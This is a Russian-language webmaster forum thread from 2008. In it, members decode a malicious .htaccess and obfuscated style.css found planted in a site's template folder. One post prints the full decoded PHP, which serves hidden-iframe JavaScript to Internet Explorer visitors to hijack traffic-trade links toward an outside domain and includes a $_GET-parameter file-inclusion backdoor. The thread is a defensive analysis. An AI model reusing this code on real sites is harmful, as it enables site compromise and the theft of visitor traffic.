Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Подскажите что за код
цитата
15/05/08 в 23:30
 WorldTraffic
только что ставил на top темплейты в ATX права 444 и вот что нашел в папке с темплейтами файл хетаксес а в нем следущее

AddType application/x-httpd-php .css
RewriteEngine On
RewriteRule (.*).htc $1.css

что бы это могло быть?
а также имеется файл style.css там вроде зендом все заделано

созданы эти файлы в один день и время 18.11.2007 9:36

p.s. я точно такого не создавал
цитата
16/05/08 в 00:25
 dejavu
в формате .htc можешь содержаться JavaScript и соответственно любой код троя или ещё чего... Какой-то специальный формат, разработанный для IE, чтобы помогать CSS, кароче бред какой-то.. имхо, полюбому удалять если не создавал сам)
цитата
16/05/08 в 01:13
 WorldTraffic
удалить успеем, я вот когда открываю файл style.css там есть такой код Zend и дальше абра кадабра, может можно както раскодировать это дело?(вроде гдето читал что можно раскодировать) может в этом коде есть что то интересно хз например домен IP сервер хакера (фантазия разыгралась)
если есть такая возможность то я могу выложить этот чуда style.css
цитата
16/05/08 в 23:15
 Alchemist
World-gay-sex, ты заархивируй этот файлик и скинь ссылку на него.
Посмотрю, что там в нем написано.
цитата
16/05/08 в 23:34
 WorldTraffic
http://thahan.net/files.zip
вот он
цитата
17/05/08 в 03:08
 Alchemist
Код:

<?php
error_reporting( 0 );
header( "Cache-Control: no-store, no-cache, must-revalidate" );
header( "Pragma: no-store" );
if ( preg_match( "%MSIE%", $_SERVER['HTTP_USER_AGENT'] ) && !$_SERVER['HTTP_X_FORWARDED_FOR'] && !$_SERVER['HTTP_X_FORWARDED'] && !$_SERVER['HTTP_FORWARDED_FOR'] && !$_SERVER['HTTP_FORWARDED'] && !$_SERVER['HTTP_VIA'] && !$_SERVER['HTTP_X_COMING_FROM'] && !$_SERVER['HTTP_COMING_FROM'] && !$_SERVER['HTTP_CLIENT_IP'] && !$_SERVER['HTTP_PROXY_USER'] && !$_SERVER['HTTP_PROXY_CONNECTION'] )
{
    $myip = isset( $_SERVER['HTTP_X_REAL_IP'] ) ? $_SERVER['HTTP_X_REAL_IP'] : $_SERVER['REMOTE_ADDR'];
    $dir = is_dir( getcwd( )."/tmp/" ) ? "tmp/" : "/tmp/";
    $sec = 5;
    $type = substr( $_SERVER['REQUEST_URI'], -3 );
    if ( $type == "css" && $_SERVER['HTTP_REFERER'] )
    {
        $fw = fopen( $dir.$myip.".ztmp", "w" );
        fclose( $fw );
        echo "body {behavior: url(\"".substr( $_SERVER['REQUEST_URI'], 0, -4 ).".htc\")}";
        exit( );
    }
    if ( $type == "htc" )
    {
        if ( file_exists( $dir.$myip.".ztmp" ) && time( ) <= filemtime( $dir.$myip.".ztmp" ) + $sec )
        {
            header( "Content-Type: text/plain" );
            echo "<script type=\"text/javascript\">window.onload=function (){ifr=window.document.createElement('iframe');ifr.id='ifr';ifr.style.visibility='hidden';ifr.style.position='absolute';window.document.body.appendChild(ifr);};window.document.onmousedown=function(){obj=0;if(event.srcElement.tagName=='A'){obj=event.srcElement;}else if(event.srcElement.parentNode.tagName=='A'){obj=event.srcElement.parentNode;}if (obj && obj.href.search(/st.php|out.cgi|cx.php|out.php|go.php|c.cgi|tm3|thumb.php/i)>=0){obj.target='qwnew';if(window.document.getElementById('ifr')){window.document.getElementById('ifr').src='http://traffup.com/fr.php'; window.document.onmousedown=function(){}}}}</script>";
        }
        $handle = opendir( $dir."" );
        while ( ( $file = readdir( $handle ) ) !== FALSE )
        {
            if ( !( $file != ".." ) || !( $file != "." ) || !preg_match( "%\\.ztmp$%", $file ) || !( filemtime( $dir.$file ) <= time( ) - $sec ) )
            {
                unlink( $dir.$file );
            }
        }
        exit( );
    }
}
if ( $_GET['css'] )
{
    include( $_GET['css'] );
}
?>

На сколько я понял (смотрел мельком) смысл всего действа таков:
1. Если обратились к файлу style.css, то создает в темповом каталоге файл IP.ztmp (где IP - IP клиента запросившего файл) и редиректит на style.htc
2. При запросе к style.htc .htaccess редиректит снова на style.css
3. При повторном запросе файла style.css проверяется, есть ли созданный файл IP.ztmp, и если есть - генерится JavaScript, подменяющий ссылки на st.php|out.cgi|cx.php|out.php|go.php|c.cgi|tm3|thumb.php ссылкой (в невидемом ифрейме) на http://traffup.com/fr.php
4. Ну и под конец, в качестве бэкдора загружает (и исполняет) скрипт переданный в переметре $_GET['css'] (Т.е. style.css?css=.....)
PS. Надо заметить аккуратность уродца, он следит, чтобы файлов с IP не создавалось слишком много, а если файлу болше пяти секунд - удаляет его icon_smile.gif
цитата
17/05/08 в 10:16
 WorldTraffic
бля нехило так, спасибо тебе
а сюда не ходил? //traffup.com/fr.php//
не смотрел что там? (а то чет я очкую туда идти)

Последний раз редактировалось: WorldTraffic (17/05/08 в 17:10), всего редактировалось 1 раз
цитата
17/05/08 в 10:26
 shahfil
world-gay-sex писал:
а сюда не ходил?


там еще какие-то проверки хитрые, по дефолту пустая страница отдается. Но ссылку ты все равно так зря запостил, сделал бы ее некликабельной все-таки..


Эта страница в полной версии